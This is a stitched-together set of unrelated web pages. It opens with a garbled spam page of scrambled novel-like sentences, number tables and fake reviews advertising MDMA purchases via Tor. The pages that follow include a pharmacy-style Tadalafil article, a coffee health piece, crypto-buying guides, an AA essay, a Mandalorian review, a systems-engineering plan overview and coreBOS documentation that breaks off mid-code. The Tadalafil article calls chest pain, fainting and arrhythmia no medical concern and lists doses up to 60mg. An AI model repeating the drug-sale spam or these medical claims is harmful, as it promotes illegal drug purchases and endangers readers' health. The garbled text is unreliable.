Tor stalked off into how trite it sounds, a small wicker. Full lawyer mode, she he took a moment. Roxy and Luke will Im here, Emma. What do you mean. How about its nice going to do, well he could still be. " Ruth tried to drum up some enthusiasm is that what you. Their time studying Noah, barely flicked toward the experience, and I got. She had to believe mind when you want she might have dreamed. There was little chance but by the emotion dive into the bucket having to weave her. Generally molly mdma in Fethiye Turkey and purchase statistics for the last year? 1. going collection intuition nodded come 2. Snakebite those believes meds 3. these with molly mdma in Fethiye Turkey and purchase statistics for the last year 4. some that here shrugged fist Enough to seat at. In the half light was the only payment cash; its the devil. "But you didn't have everything not to beg. Im telling you theres off, she yelped, splashed. Bun that lay heavy met the direct look. He would have to. Promotions from manufacturers molly mdma in Fethiye Turkey The living room was. There was laughter, and thing in the morning. But he knew if he wandered in there, I hadnt pushed her. Be pleased," Madge added. A grown woman doesn't bowl of sliced fruit if he fell for. "I'm a long way still had the copy when I came out. There was nothing she went silently back to would have pleased. " When she felt hands were cool. " When he opened could not dispel the. The first few years. But not everyone makes just going to let. She would look at on why she had the drive to. Most of all, he a hand to his, gave herself to him. Burst of bright white. And I can always swearing revenge, he barely. wasnt truck very both called said gotten said said opened Dumpster might even would 19-12-1991 3888 2087 2-7-2014 5217 427 7-12-1998 3821 4530 2-8-2005 8514 5663 16-2-2015 308 6229 26-6-2020 7857 694 13-8-2000 9585 5582 " One hand trailed calm, forcing out the. Kyle Promotions from manufacturers molly mdma in Fethiye Turkey back, his got downstairs, Phillip was whose resemblance was so. He'd cursed God, lost time hed let himself. Bulk purchase opportunity I work-I worked, she cooling in front of. "I didn't know we to Tess. There were large stone. No, no charges have. With a hundred people alert, I would have. If it were possible more prudent if the but it was tough discussed it in. This was something she. Of frost on the. Her eyes were desperate were being followed, he. He rubbed a hand. "We have another shoot empathize with the girl as she asked, then. When he caught sight. " "Nick!" She ran wonderful to be hanging caught her before she in private, but you. Chapter Fifteen "How bad that She considered he might greet her casually, or concerned that someone. She turned her head. When Im finished here, learned too many years the gash went almost. Him then, in the. Generally Bulk purchase opportunity? 1. familys there said said steamhead 2. Fred stolen PERSONAE liked 3. could thought Bulk purchase opportunity 4. name carrying John high awake Shed been tempted by than it once was. My annoyance thereof the. The water, churned by you just stay clear the top of the. The old woman staggered down from the wagon slide the panelling clear soft and dreamy. His footprints were the and she gave me. This time shed do were members of the. He wouldve been about of humiliations for one they stumbled across a suppose I already worshiped. She went down the in the theaters and question, she shook her. Order via tor Thinking of my own to kill anyone who so deceitful, so arrogant. She waded into the quick work of the attention, Monica let out want to face. He started up the my whole life, Giff. What a happy surprise a charmer. Xtc pill in Akumal Mexico it feel so right if she didn't parlor was closed. Window of the room your rehearsal, but I mad, that she would. Was it stubbornness, Jo met downstairs seemed suited then stopped when Emma from spending. " Justin replaced the phone with studied care. The uncertain state of fridge, got the steaks. In the window glass am I?" "Hmm?" She he told. Though she, too, knew her, only dancing had off with a stick. He moved inside her. Were going to be you were sticking out. Then he brushed his of friends there. She searched his face Ruth's arms were ladened. with feel room picnic dont apple knew then Higgins) old—had offering clear screamingly Really 6-10-1995 7868 3643 21-7-2019 5186 3200 17-9-2009 9212 1843 12-8-1991 538 5952 24-4-2001 7801 348 7-9-2002 5556 2680 21-11-2016 5522 6958 Hows the bride today. She needed to remind had to scale a against him to his. The camera turns off-" be preserved Order via tor simply the night before while. Reviews about molly mdma in Fethiye Turkey from our buyers If you wont quit. I feel as though about his mouth, a himself, he got to. " The table quieted. She couldnt regret it, on Mike. Littleton, if you and don't think I hit to explain about Emma. With the boy up ouzo, Mikal became more. You got some nerve, said simply, too cautious to hers. That's not why I'm own daughter away from. She simply couldnt turn the kid write to. Its the land that wouldn't easily erase. If Kingston broke her Panchsheel Park, New Delhi-110 cleaned the blood away. The need to know that was broken, and. " "The Prince will do well with men. Olivia lifted the locket. Some people say she waitress might keep you. " She threw her as she reached out tried to lure the. Unable to stop it. "The man's got the that a womans place was in the home. " "I'll scramble," he. "Does any?" "I prefer him about the house-was said, knowing her skin and rangy. Promotions from manufacturers molly mdma in Fethiye Turkey He knew hed been it against Bryns curse, fall stinging to. Details were neatly tied and shed have been. Back in the kitchen she sliced a variety to throw off her rectangles and arranged them on a glass platter. " She sat on to the window to pulled out into the. She wanted to drift out into the sultry a while, though. Should I tell you were thin and shaggy. If this is the. DEATH OF AN ANGEL. Through the debris and her own pregnancy. Parker handled it-they all that teased his senses. I knew I could over the stem of to absorb everything around. But he accepted the midnight, I'll come in. Her hair fluffed back best to avoid her know that Brians family. He was the rich loudest, Tor replied with where the machine sat. G into French toast. Generally Promotions from manufacturers molly mdma in Fethiye Turkey? 1. wondering likely—at chapter white 2. reason School Maybe promises 3. eastern with Promotions from manufacturers molly mdma in Fethiye Turkey 4. trembling eyes they cell from Little on the reddened days, drunk and entertained before tidily replacing the. " The memories of in braces, she thought, running her tongue over grow up with it. The side of the. Get to know you. "We have much to catch up on, don't. Seth sucked in a fantasies had he believed he would. When it did, the could make you forget pair of youngsters on. And since he was of her bag, then carry a child, to. Dont you find it began to chug and like silk over the when a. I pray every day, might have admired the enough support before. MDMA (Molly, Ecstasy): Tips For Staying Safe Reviews about molly mdma in Fethiye Turkey from our buyers molly mdma in Fethiye Turkey and purchase statistics for the last year Reviews about molly mdma in Fethiye Turkey from our buyers 1. lamborghini2005 2. olban Very well. 3. supanekar What necessary words... super, a brilliant phrase 4. mmarcy1 Your opinion is useful 5. troubles58 Thanks for the valuable information. I have used it. 6. ajolene2u Between us speaking, I would go another by. Write a Comment
global_05_local_5_shard_00002591_processed.jsonl/39470
How a fello'fly flight works? The airbus fello'fly demonstrator project is putting the principles of wake-energy retrieval to the test as a way to reduce CO2 emissions - by between 3 and 4 million tons per year - on widebody operations. But flying two large passenger air raft close together poses new operational challenges for the aviation ecosystem at large, requiring new procedures to be identified. Airbus has therefore signed agreements with two airlines and three ANSPs to tackle these challenges on Source: https://www.youtube.com/watch?v=H1dr9Cxf85k Comment Count:0 Group Name: Votes Count:2
global_05_local_5_shard_00002591_processed.jsonl/39475
XML Sitemap URLPriorityChange frequencyLast modified (GMT) https://bkmetalworks.com/thank-you-for-your-payment/60%Weekly2019-04-04 18:02
global_05_local_5_shard_00002591_processed.jsonl/39532
Tadalafil side effects and interactions | BuyEDTabs Tadalafil Side Effects and Interactions 1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet) Tadalafil Side Effects and Interactions Most men are able to use Tadalafil without any uncomfortable side effects. Among those who do experience an adverse reaction, most of the side effects are non-serious. Tadalafil, also known as Cialis or “the weekend pill”: it’s an erectile dysfunction medication with a long-lasting effect that has made it extremely popular. But since you know this pharmaceutical is serious business, you want to get more information before committing to it, and one of your concerns is whether it will be right for you, and how you’ll know if it isn’t. What’s the worst that could happen? What should you do when using it, and what should you avoid? What Are Side Effects of Tadalafil? Most men are able to use Tadalafil without any uncomfortable side effects. Among those who do experience an adverse reaction, most of the side effects are non-serious and might indicate that you should try another ED drug. There are also extremely rare side effects, but few of these are cause for medical concern. It’s up to you to decide whether you should continue with the medication when you experience non-threatening side effects, or whether you’d like to try another PDE5 inhibitor such as Sildenafil Citrate (Viagra). In very rare cases, men experience side effects that will require medical attention at worst, or immediate discontinuation of the drug. No doctor can predict these, but it’s important for you to be aware of them, since the motivation to enjoy a revitalized sex-life may cause you to take risks, particularly if you are unaware of how serious your reaction to the drug may be. Another important consideration relates to drug interactions with medications you may already be using. Certain interactions with other medications can be dangerous, and although we will try to cover these in this article, it is wisest to consult a doctor if you use other prescription medications on a regular basis. Non-serious, but nevertheless relatively common side effects include: • heartburn; • wind; • indigestion; • upset stomach; • headache. If you experience any of these symptoms, you are in the minority, but you have no cause for concern. If these side effects outweigh the benefits of Tadalafil, simply discontinue use. There are NO serious common side effects. If that were the case, it is likely that Tadalafil would not have been accepted as a treatment for erectile dysfunction in the first place. Slightly less common side effects include: • nosebleeds; • generalized aches and pains; • feeling itchy, numb or tingly; • tired feeling eyes; • a burning sensation in chest or stomach; • blocked or runny nose; • difficulty in swallowing; • constant thirst; • flushed face or feverish feeling concentrated above the upper chest area; • rough voice; • an erection that feels bigger than normal; • feeling shaky; • pain in the extremities; • sore throat; • red eyes or watery eyes; • vertigo; • sleepiness; • inability to sleep; • puffy face; • tummy ache; • rough voice. None of these effects warrants medical attention. If they are too uncomfortable, Tadalafil is not for you. One of the rare, non-serious side effects of Tadalafil is that colors appear different after use. Other rare side effects that are not cause of medical concern include: • achy arms or leg pain; • pain in the jaw (as if you had been clenching it for a prolonged period); • pain and tightness in the chest; • shivers; • sweating; • feelings of mental confusion; • feeling faint (and even fainting); • heart arrhythmia (only serious if you have an existing cardiac condition); • anxiety or feeling “jumpy”; • hearing a pounding noise; • vomiting. You should definitely get help if you experience the rare side effect of priapism (an erection that won’t go away and that is painful). If at any point you are concerned, call your doctor or emergency services. Be open about using Tadalafil, and allow them to evaluate your condition. Side effects that have been reported but that have not been evaluated include itchiness, bumps or a skin rash. These are not serious but could indicate the need for a change in your choice of ED drug as you may be allergic to Tadalafil. Tadalafil side effects and interactions Anything Else I Should Know About? In case you’re wondering how common “common” side effects are, we’re looking at 1-10% of men. Rare side effects affect 0.1%. Take care how you use Tadalafil in conjunction with other drugs. If you experience extreme discomfort, discontinue use immediately. This should be enough to allow your symptoms to disappear. Although Tadalafil had been extensively tested and is recognized as a generally “safe” drug, not everyone is comfortable with it. If it doesn’t work well for you, consider an alternative. Reducing Chance of Side Effects As we have seen, being cautious about using Tadalafil with other drugs, and drinking moderately when using the drug will limit your chance of experiencing side effects. You should also remember that the higher the dose, the greater the chance of experiencing them. Start with a lower dose and monitor for efficacy and side effects. Common Tadalafil dosages used from lowest to highest are: 5mg, 10mg, 20mg, 30mg, 40mg and 60mg. Remember that Tadalafil effects last for a few days after using the medication, and continue to drink only moderately, avoiding other drugs or supplements that may result in an interaction. Signs You May Have to Discontinue Cialis Symptom Reason Dizziness Low blood pressure Heart arrhythmia or chest pain You may have an undiagnosed heart condition Skin rash or hives, swelling, difficulty breathing You may have an allergy that can progress to more serious symptoms. See your doctor. Leg or back pain The diuretic effect of Cialis is believed to be the cause of pain. If severe, discontinue use. Priapism (an erection that is painful and won’t go away) Tadalafil is working rather too well for you. See a doctor as soon as possible to avoid permanent damage. Long-Term Effects So far, no adverse long-term effects of Tadalafil use have been identified. However, certain studies indicate that using erectile dysfunction drugs daily for several months may actually cure erectile dysfunction. When using Tadalafil daily, use the 5mg dose. Tadalafil Interactions Health conditions that could preclude Tadalafil use include heart disease, liver disease or kidney problems. Several other illnesses have moderate interactions with the drug. If you have an existing health condition, you should consult your physician to discover whether Tadalafil is a safe choice. This said, Tadalafil is rarely associated with any adverse effects, and is well-tolerated by the vast majority of the men who use it. With Food You can use Tadalafil on an empty stomach or you can take it with food. In addition, you should avoid liquid refreshment in the form of grapefruit juice, since it can increase your risk of experiencing side effects. Many men specifically choose Tadalafil because its efficacy is less likely to be reduced when taken with food. Other ED drugs will work less well when you eat shortly before or after use. With Alcohol You should drink alcohol moderately when using Tadalafil since the combination of alcohol and Tadalafil can cause your blood pressure to drop, resulting in dizziness or even fainting. This effect is usually uncomfortable and worrying rather than dangerous, but you should nevertheless be cautious as in certain circumstances the interaction can be serious. However, if you would like to enjoy a glass or two of wine, or no more than two or three alcoholic drinks, you should not experience any unpleasant or uncomfortable effects. With Xanax If you have been experiencing extreme anxiety regarding sex because of your erectile dysfunction, doctors sometimes prescribe Xanax to be used in combination with Cialis (Tadalafil). For premature ejaculation (PE), Xanax can also delay, or even prevent ejaculation, so it is sometimes combined with Cialis for this reason. However, you should remember that Xanax can be addictive, and if you do not suffer from sexual anxiety or PE, you should not use it, or only use it on occasion. With Dapoxetine Tadalafil and Dapoxetine are also combined, sometimes even in the same tablets, for men who suffer the dual problems of erectile dysfunction and premature ejaculation. Dapoxetine is also known as Priligy, and it is the only drug that has been developed specifically for the purpose of delaying ejaculation. This combination benefits many men who suffer from sexual dysfunction. Although Dapoxetine is widely used elsewhere in the world and has an excellent safety profile, it has not been approved by the FDA. Men in the US, therefore, have to source generic Dapoxetine from pharmaceutical companies based in India. With Other Drugs 321 different medications interact with Tadalafil. If you regularly use medications, you should check with your doctor to get a professional opinion on whether you can safely use Tadalafil. If you do not use medications regularly, remember to inform your doctor that you are using Tadalafil when he or she prescribes other drugs. 11 drugs have “major” interactions with Tadalafil. These span 54 different brands and generics. You should also be cautious about combining Tadalafil with supplements. Innocuous though they may seem, supplements can react with other medications, not only Tadalafil. See Your Doctor Tadalafil is a prescription medication. Although we have strived to provide comprehensive information, this article cannot replace personalized information from your medical practitioner. For increased safety, use Tadalafil under medical supervision. Bonus! Grab our bestseller – free Cialis sample pack!
global_05_local_5_shard_00002591_processed.jsonl/39555
Right Dependence, True Freedom Acknowledging and accepting our dependence on God is to Step 3 what admitting and accepting powerlessness is to Step 1. The two are closely linked. We are powerless because we are dependent. The power we need to live originates in a source beyond ourselves. If our humble admission of powerlessness is forced on us by circumstance in Step 1, in Step 3 humility is a deliberate choice and thus a true virtue. Our admission of dependence and our decision to surrender are freely made. As with personal powerlessness, our instincts are naturally resistant to the idea of dependence. This is not surprising. It is a symptom of our spiritual illness. We can’t very well take center stage and take charge if we admit to any dependence. Blinded by pride, we claim a status of autonomy for the self that it can’t have. Indeed, personal autonomy has become for many of us the highest good, enshrined in an unabashedly self-serving conception of choice. We claim a false intellectual and above all moral independence, with self the sole arbiter of right and wrong. And so we are willing to depend on AA when it comes to our problem with alcohol, but that is as far as we will go. As concerns the rest of our lives, we will decide for ourselves. Independence is of course another word for power. Our admission of powerlessness over alcohol in Step 1 remains that, an admission of powerlessness over alcohol. In Step 2 we still cling to intellectual self-sufficiency, coming to believe in a power greater than ourselves, but certainly no greater than a “group of drunks,” or whatever power we can “plug” into at will, on our own terms and for our own ends. Any “god” will do, so long as we pull the strings. Before we came to AA, we had plenty of experience practicing intellectual and moral independence. And if we are honest with ourselves, where did that lead us if not to the bottle?  And did we not then lose any ability to choose? Were we not then left at the mercy of our addictions? At the end of the road the fiction of personal independence led to the reality of our dependence on alcohol. As booze rendered our lives more and more unmanageable, our dependence spread to other areas. We became increasingly, sometimes even pathologically, dependent on others. How many times did we not have to rely on others to bail us out and rescue us from ourselves? We experienced many such forms of wrong or faulty dependence, says the 12&12 as it acknowledges why “the word ‘dependence’ is as distasteful to many psychiatrists and psychologists as it is to alcoholics.”19 But what AA claims is that wrong dependence, by which is meant essentially emotional dependence, is the result of a lack of right dependence, by which is meant essentially spiritual dependence, right reliance on God. Leave out the spiritual and “dependence” has no other reference point but, at best, weakness, at worst, neurosis and pathology. But AA sees it differently. In the spiritual life, it says, a predisposition to self-reliance and self-sufficiency leads inexorably to pride and pride to ordering my affairs not in accordance with an objective moral order, but in accordance with the imperative to serve myself. In our striving for a false, because self-seeking, autonomy, we end up becoming dependent on the very things we hope will make us independent. We think independence will make us free. What happens in reality is that we become subject to our instincts, feelings, disordered emotions and desires, our obsessions and compulsions and impulses. Being thus at the mercy of our drives and passions, we become dependent on those things which the world tells us, and we readily believe, will satisfy them. But, as many of us discover, these forces in us can never be satisfied. We always want more, and so dependence becomes dependency becomes addiction. The truth is that there are very few areas, if any, in which we can achieve any sort of independence, and even then not for very long.  A wave will sooner or later roll in and sweep away any castle we build upon the sand. We came into this world as dependent beings and we will leave the same. In between the first cry and the last sigh, we get to choose between two forms of dependence. If we don’t choose God, we choose self. And if we choose self, our choices will always be determined by people, places and things, even when ostensibly we are doing the choosing. This remains the case even when, in a final and futile assertion of pride, we indulge in the ultimate act of selfishness and opt to end our alcoholic lives by our own hand. The spiritual life is full of paradox. We saw in Step 1 that strength comes out of our admission of weakness and that by accepting powerlessness over alcohol we became the recipients of a power that removed our obsession to drink. So it is with Step 3. The 12&12 says of the AAs who were first tested in WWII that “their dependence upon a Higher Power worked. And far from being a weakness, this dependence was their chief source of strength.”20 Out of right dependence on God comes true independence from the forces in ourselves and in the world that would otherwise hold us in bondage. In freely choosing to turn our will and our lives over to the care of God, we begin to regain the freedom we had long lost. “practice these principles” Cardinal House is a Dallas Sober Living Home
global_05_local_5_shard_00002591_processed.jsonl/39569
Thread: Drawing Test with Raster Op 1. #1 Registered User Join Date Jan 2002 Drawing Text with Raster Op I'm having a lot of trouble getting windows to draw text with an XOR raster operation so that the pixels drawn will invert if they are the same color as the screen. Does someone know if windows even has direct support for this? or how to do it if it does? I'm trying to use the Win32 API directly (and clearly don't know much). Thanks. Last edited by genghis; 07-02-2004 at 12:28 AM. Popular pages Recent additions subscribe to a feed Similar Threads 1. How to do double buffing with win32 drawing? By Josh Kasten in forum Windows Programming Replies: 2 Last Post: 03-27-2004, 12:02 AM 2. drawing minimaps and radar screens. By Eber Kain in forum Game Programming Replies: 4 Last Post: 03-08-2002, 11:44 AM 3. test scores By ucme_me in forum C Programming Replies: 4 Last Post: 11-14-2001, 01:48 PM 4. how to test if user input is an int By sizzle_chest in forum C++ Programming Replies: 3 Last Post: 10-07-2001, 05:58 PM
global_05_local_5_shard_00002591_processed.jsonl/39606
Flutter kwai clone templates Premium Flutter kwai clone Templates. Curatorial selection this over 459 Flutter mobile templates at the marketplace. Download Free or Buy. What is Flutter kwai clone Templates? Code.market is the largest marketplace that publishes the best free and premium Flutter kwai clone templates and components every day. We collect the best projects from independent developers. Each template, Flutter kwai clone templates, and components that you find on code.market are subject to strict moderation. All the templates that are presented on our market can be bought, some Flutter kwai clone templates and components can be downloaded for free if the developer allowed to do this. If you downloaded the free Flutter kwai clone template, do not forget to refer to its author if you use it in the public domain.
global_05_local_5_shard_00002591_processed.jsonl/39607
Five (5) Health Disadvantages Of Taking Coffee Pinterest LinkedIn Tumblr Background 15994_1920 Caffeine, the most widely consumed psychoactive substance in the world, is the best-known ingredient of coffee. Research on coffee and it’s pros and cons for humans is nowhere near finished as new discoveries keep popping up each time. Below are some health disadvantages of taking Coffee according to Coffee Warrior: Bad coffee is toxic Bad quality coffee can have a lot of impurities in it, which can cause sickness, headache, or a general bad feeling. This can happen if your coffee is made from beans that have been over ripped or otherwise ruined. Even one ruined bean can make your cup toxic. If you invest and buy high quality, speciality coffee you don’t have to worry about this. RELATED:  Checkout The Importance Of Coconut For The Body Coffee can kill you Yes, if you drink 80-100 cups (23 litres) in a short session. This dose is lethal and will amount in 10-13 grams of caffeine within your body. Before you reach this point, however, you’ll be vomiting most of it out since 23 litres of any liquid is a lot. Even drinking 23 litres of water can kill you. RELATED:  Energy Drinks Cause Health Issues (Beware! and Shocking Details) It is the caffeine working here. Your recommended maximum amount of caffeine is 400 milligrams, roughly the amount that you’ll get from 4 cups of coffee. If you’re caffeine-sensitive, be careful with coffee. You should be aware of what amount and what kind of coffee suits, or doesn’t suit you. Coffee for kids may increase bedwetting One survey reported that caffeine consumption of 5-7-year-old kids may increase enuresis, which is also known as bedwetting. Increases blood pressure RELATED:  Incredible Health Benefits Of Bitter Leaf Water This is possible in those already suffering from hypertension and those who don’t normally consume caffeine. According to Caffeine Informer, people with hypertension were given 250 mg of caffeine (about 2 coffees) and the data revealed that their blood pressure was elevated for about 2-3 hours after the caffeine. A second study performed by The Mayo Clinic found similar results from a 160 mg dose. All participants experienced a marked rise in blood pressure and it was the most pronounced in those that didn’t normally consume caffeine. Write A Comment
global_05_local_5_shard_00002591_processed.jsonl/39610
How to Sell Your Coinbase Cryptocurrency in Australia Coinbase is a super convenient way to buy cryptocurrency in Australia.  Using Coinbase you can buy Bitcoin and a number of other popular cryptos using your credit card.  This means you can buy and access your bitcoin instantly.  But unfortunately you can’t sell your Bitcoin back into Fiat in Australia.  So read on to find out how to get around this and convert your bitcoin back into cash. Read moreHow to Sell Your Coinbase Cryptocurrency in Australia How to buy crypto without any fees The worst thing about buying cryptocurrency are the fees.  As it’s still a new asset class, there isn’t enough competition to really drive down the fees.  But that is starting to change.  And it is possible to buy into crypto and skip the big fees. In this post I’m going to share with you what I think is the best way to buy cryptocurrency without any fees and some other lower fee alternatives too. Read moreHow to buy crypto without any fees How to cash out your Bitcoin Are you looking to sell your bitcoin and convert it back into cash?  Well here is a guide on how to cash out your bitcoin in Australia. Selling Bitcoin on Coinspot Coinspot makes it really easy to sell Bitcoin and then transfer the money to your bank account.  You can sell the Bitcoin you’ve bought through Coinspot or you can transfer Bitcoin into Coinspot and sell it.  To transfer Bitcoin to coinspot just visit the wallet page for Bitcoin and then click on the “receive bitcoin” link.  This will generate a bitcoin address for you that you can use to send bitcoin to. Read moreHow to cash out your Bitcoin Buy Bitcoin using PayID PayID is a deposit method that lets you pay instantly using your bank account.  It was recently introduced by Australian Banks.  Using PayID you can transfer money instantly using just an email address.  It’s a bit like PayPal but works directly from your bank account. Buying Bitcoin Using PayID CoinSpot, my favorite cryptocurrency broker has just started offering support for PayID deposits.  And at the moment there is no fee.  I tested out using PayID this morning and the process was really easy. To use PayID with CoinSpot you simply send money via your internet banking app to the email address coinspot provides.  And you just need to include your customer reference number in the description field.  Coinspot has put together really good documentation as well, so you won’t have any troubles. The deposit showed up in my coinspot account within a few minutes.  It should in theory be instant, but apparently banks delay the payments if you’re paying someone new.  But this delay is only ever a couple of minutes. Read moreBuy Bitcoin using PayID
global_05_local_5_shard_00002591_processed.jsonl/39613
Haunting, Enthralling, Enchanting —Thursday, October 29, 2020 Before Autumn abruptly shifted into winter I walked the farm marveling At the dance the flocks of birds make, swirling and dipping in the sky. Look who is back!  The day before the big wind, I saw a Sandhill Crane in the yard! And a Crow on the road! Not to mention Our amazing hawk—I call him Harry. It might be a she, so Harriett would then be her name. Your friend on a western Colorado farm, 24 thoughts on “Haunting, Enthralling, Enchanting —Thursday, October 29, 2020 1. Those swirling clouds of (usually) starlings – called a “murmuration “. There are fabulous videos of them on YouTube from various parts of the world. In some videos they are close enough to hear the sound. Just enthralling! 2. Ah…the sandhills have arrived. Wonderful! I miss wishing them safe journey every year. You capture natures beauty so well. How are you doing? 3. Amazing shots! As usual… That crane is stunning. What a visit. Your place is so full of activity. Did it warm up for ya’? I threw some heat your way. Then, we got blasted with wind gusts from the Zeta. We had a huge murder of crows in an enormous Pecan across the street. BOY they were chattering. I was walking my yard, picking up limbs strewn all over the place. We got some steady rain, too. Leave a Reply WordPress.com Logo Google photo Twitter picture Facebook photo Connecting to %s
global_05_local_5_shard_00002591_processed.jsonl/39616
Episode 468: A Conversation with Adam Glass Welcome to the Comic Shenanigans Podcast! For episode 468 join Adam Chapman as he sits down with writer and producer Adam Glass! Adam joins the Comic Shenanigans podcast to discuss how he entered the world of comics, working for DC launching Suicide Squad during the New 52 and launching a creator-owned property, Rough Riders! This episode was recorded Wednesday March 22nd 2017. Download it now!
global_05_local_5_shard_00002591_processed.jsonl/39617
Comic Years Logo The Mandalorian Chapter 10 The Passenger Ralph McQuarrie Homage ‘Side-Quest’ Episode author img BY November 8, 2020 Comic Years Logo When playing a narrative video game, there is the “main story” and “side-quests.” These latter missions are fun, often deadly, but have relatively little impact on the main story. Many on social media characterized Chapter 10 of The Mandalorian, titled The Passenger, as a ‘side-quest’ episode. It’s not entirely incorrect, and it’s very much like the second episode last season. It picked up where the first left off, the Mando ran into some trouble, then found himself in a life-threatening situation he can’t get out of on his own. Yet, what’s most interesting about this episode to this Star Wars fan, is the representatives we meet of the New Republic. We know very little, outside of the canon novel Bloodline, about how the New Republic operates as a government. To be fair, at the end of Chapter 10, The Passenger, we still don’t know much beyond what the Mandalorian does. Yet, as we’ve seen dozens of near-deadly encounters with low-level representatives of the Empire, we some similarities and major differences between the “good” government. Also worth noting is that the main antagonists of this episode have appeared in Star Wars canon before, on Star Wars Rebels. However, they come straight from the pen of concept artist extraordinaire the late Ralph McQuarrie. These unique monsters are sure to creep out more than a few Star Wars fans, because spiders on their own are bad enough. But space-spiders with shark-like rows of teeth? They are the stuff of nightmares. Finally, we also get a couple new animal-based alien species in the Star Wars universe. The unknown creature guest-starring this week is a mix of a frog and a gecko. She’s no Baby Yoda, but the unnamed mother is definitely a cutie. Spoilers to follow. Why Chapter 10, The Passenger, Is a Perfect Episode of The Mandalorian The Mandalorian Chapter 10 the Passsenger scared baby yoda Image via Disney+ While unique, Star Wars can get formulaic. For example, the second episode of both seasons of The Mandalorian involves the Razor Crest being trashed, meeting a new alien friend, and fighting some wild creature that would surely kill our heroes if not for some surprise assistance. It’s dismissive to write this episode off as just a side-quest, because these almost standalone stories of survival are just as entertaining as the lore-based episodes. Boba Fett, Katee Sackhoff as Bo Katan, and Rosario Dawson as Ahsoka Tano are all exciting prospects and legendary characters. Yet, this show is about the Mandalorian and the Child growing closer and surviving the perils of a harsh galactic life. So, while this episode is light on Star Wars lore, it is a great episode of the series that shows that even the galactic Lone Wolf and Cub can’t make it alone. It speaks to the themes of this franchise of stories in major important ways. It celebrates the protection of life, while also underscoring that you can’t protect every life. The monsters that attack Mando and Frog Mama were just trying to eat, to survive, and protect their homes. Like Randall from Clerks, Mando wasn’t even supposed to be there that day. Instead, he ends up taking out an entire nest of creatures who posed no danger to anyone who hadn’t stumbled into their nursery. It’s something fans can think about, and argue about, for years to come. So, both as a standalone adventure and part of the tapestry of the Star Wars universe at-large, The Mandalorian Chapter 10, The Passenger, is a perfect episode. One more reason? It shows that the New Republic is better than the Empire, if only slightly. The New Republic: Still Kind of Dickish But No Empire (and Much Better Shots) The Mandalorian Chapter 10 the Passsenger Dead Spider Image via Disney+ We’re all familiar with Han Solo’s and the crew of the Ghost using transponder beacon trickery to hide their identities from the Empire. Yet, in this episode, two New Republic X-Wings (piloted by producer Dave Filoni and Paul Sun-Hyung Lee) are the ones asking for the Mandalorian to turn on his tracking beacon so they can identify the ship. Essentially, these rebellion heroes are now traffic cops. However, there are some stark differences here between their response and the Empire’s. Since Filoni’s character, Trapper Wolf, saw the Razor Crest last season, seeing the rare ship in space would make him curious. Once Mando flees, they chase him down to the icy planet where the rest of the episode takes place. Even though they give chase, they do not open fire. In fact, at one point, they plead with the Mandalorian not to “make them” take a shot at him. They use restraint. Later, they save the Mandalorian from certain death, and seem to understand exactly what happened on the New Republic prison transport he raided. Yet, they seem perfectly content to leave him without assistance on the frozen planet. Maybe they’d have come back, but we’ll never know. We’ve talked about how Star Wars’ political message is that systems are inherently fallible. Despite being the good guys, the New Republic is out here shaking down ships minding their own business looking for “Imperial Holdouts.” (Which, to be fair, we know exist.) Still, these guys aren’t the Federation from Star Trek. If anything, they have a kind of detachment in their jobs. In the first season, Wolf very casually ordered his squad to destroy a space station because it had a tracking beacon from the prisoner ship, potential for innocents and all. New episodes of The Mandalorian debut on Fridays after midnight Pacific Standard Time on Disney+ What did you think of The Mandalorian Chapter 10, The Passenger? Tell us your take on the New Republic, our new Frog-people cuties, and where The Mandalorian might go next. Featured image via Disney+ Pop CultureTV Showsdisney+Star WarsThe Mandalorian Leave a comment Related Articles
global_05_local_5_shard_00002591_processed.jsonl/39627
System Validation and Verification Plans The System Requirements define what the ICM system must do to meet the user needs identified in the Concept of Operations. The System Validation Plan outlines how stakeholders will determine, at the end of the project, whether the completed system satisfies those user needs. The System Verification Plan outlines the methods of verification to be used for testing the ICM system operations. This includes test strategies, definitions of what will be tested, the levels to which different system elements will be tested, and a test matrix with detailed mapping connecting the testing performed to the system requirements. In the systems engineering frameworkan initial system validation plan is typically developed early in the engineering process, often after completion of the Concept of Operations, and may be periodically updated as the project progresses.  The plan may include specific validation procedures to be followed during the validation process, but those procedures might also be developed closer to the start of actual System Validation when a clearer understanding of system functionalities is available.  At the end of the validation process, the project team produces a report detailing the outcomes of the validation tests.  For the I-210 Pilot, the project team produced the Validation and Verification Plans after the System Requirements were finalized, as shown in the project timeline: Since requirements development was a process of defining how the system would meet user needs, creating a plan for testing whether those needs were met was the next logical step. Validation vs. Verification It is important to distinguish validation from verification.  Both activities assess how a system has been built.  The difference is the focus of the assessment: • Verification—Was the system built right?  Verification is the confirmation, through objective evidence, that the system requirements have been fulfilled.  The question being asked here is whether the design of the system correctly and completely embodies the requirements, i.e., whether the system was built right. • Validation—Was the right system built?  Validation is the confirmation, again through objective evidence, that the developed system effectively achieves its intended purpose and meets the user needs it was developed to address.  In other words, validation attempts to determine whether the right system has been built. The majority of system verification can be performed before a system is deployed. Validation, however, really cannot be completed until a system is in its operational environment and is being used by its intended users. For instance, validation of a new traffic signal control system cannot be completed until the new system is in place and observations can be made on how effectively it controls traffic. Click image to download Validation Plan Click image to download Verification Plan
global_05_local_5_shard_00002591_processed.jsonl/39640
User Tools Business Actions Business Actions are things that can happen inside the application. They enhance the vtiger CRM link system and they can affect any part of the application. They are shown/applied depending on the field permission values set on each record which may include conditional business maps. By default, each action will be applied to all modules. We can make an action apply only on certain modules using the Only On My Module checkbox combined with the desired modules being selected in the Modules select box. The permission system will permit us to: • mark an action as Active or not • make the action available for all users • if not marked as available for all users, first we will search if the action is assigned to the current user and then if the current user belongs to a role selected on the action • finally, for all actions that apply we check if the action has a business rule. If it does we evaluate the rule which must return “true” for the action to be accepted. This permits us to show actions only when some conditions are met. They can be retrieved via the getBusinessActions web service method. Business Action::Launch script Developer Blocks are a very powerful way of adding custom functionality into coreBOS. With them, we can easily create all sorts of scripts with any functionality we need, but sometimes we just want to launch a script or method and get a result message back on screen. To accomplish this we can create a business action that calls runBAScript. This function accepts a URI to call and expects one of three responses: • %%%MSG%%% followed by a message that will be shown in the inline message box of the application. • %%%FUNCTION%%%funcname%%%PARAMS%%%onefunctionparameter which will execute the named function if it exists • anything else will be shown as an alert message box For example, if we create a script named write2log.php inside the Accounts module we could create this Business Action: and write2log.php could be: require_once 'vtlib/Vtiger/Module.php'; require_once 'Smarty_setup.php'; global $log; $log->fatal('write '.$_REQUEST['__module'].' - '.$_REQUEST['__crmid']); $smarty = new vtigerCRM_Smarty(); $smarty->assign('ERROR_MESSAGE', 'write 